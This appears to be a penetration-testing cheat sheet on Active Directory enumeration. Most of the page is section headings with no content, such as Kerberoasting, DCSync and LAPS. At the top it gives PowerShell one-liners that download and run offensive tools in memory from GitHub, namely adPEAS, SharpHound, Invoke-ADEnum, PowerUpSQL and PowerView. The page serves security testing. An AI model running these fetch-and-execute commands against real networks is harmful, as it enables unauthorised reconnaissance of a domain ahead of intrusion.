Full Active Directory (AD) Enumeration
Work in progress
Enumeration Tools
# adPEAS
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1);Invoke-adPEAS
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS-Light.ps1);Invoke-adPEAS
# BloodHound
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup"
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup" -Loop -Loopduration 06:00:00 -LoopInterval 00:15:00
# Invoke-ADEnum
IEX(IWR -UseBasicParsing https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1);Invoke-ADEnum
# PowerUpSQL
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
# PowerView
IEX(IWR -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1)Native AD Module
General Enumeration
Domain Computer Enumeration
Domain Enumeration
Domain Controller Enumeration
Domain Policy Enumeration
Domain Trust Enumeration
Forest Enumeration
Group Enumeration
Group Managed Service Accounts
Group Policy Enumeration
Find GPO's Vulnerable to Takeover
Organisational Units Enumeration
User Enumeration
Less Focused on but Equally Important Areas
Access Control Lists
AppLocker / WDAC
AS-REP Roastable Users
Kerberoastable Users
PowerView
DCSync Rights
PowerView
Delegation - Constrained
Delegation - Unconstrained
Deleted Users
LAPS Enumeration
LAPS Delegation
Machine Account Quota
MSSQL Enumeration
PowerUpSQL
SQL Commands
MSSQL - PowerupSQL exploit example
Shares and Files Enumeration
PowerView (Shares)
PowerView (Files)
Snaffler
SPN Enumeration
User Hunting
PowerView
Administrative User Identification
Local System Enumeration
PowerView
WinNT Service
Domain Group Enumeration
AdminCount = 1
PowerShell
PowerView
AD Groups with Local Admin Rights
PowerView
Virtual Admins
PowerView
Systems with Admin Rights
PowerView
Tools
Bloodhound
Ingestors
Last updated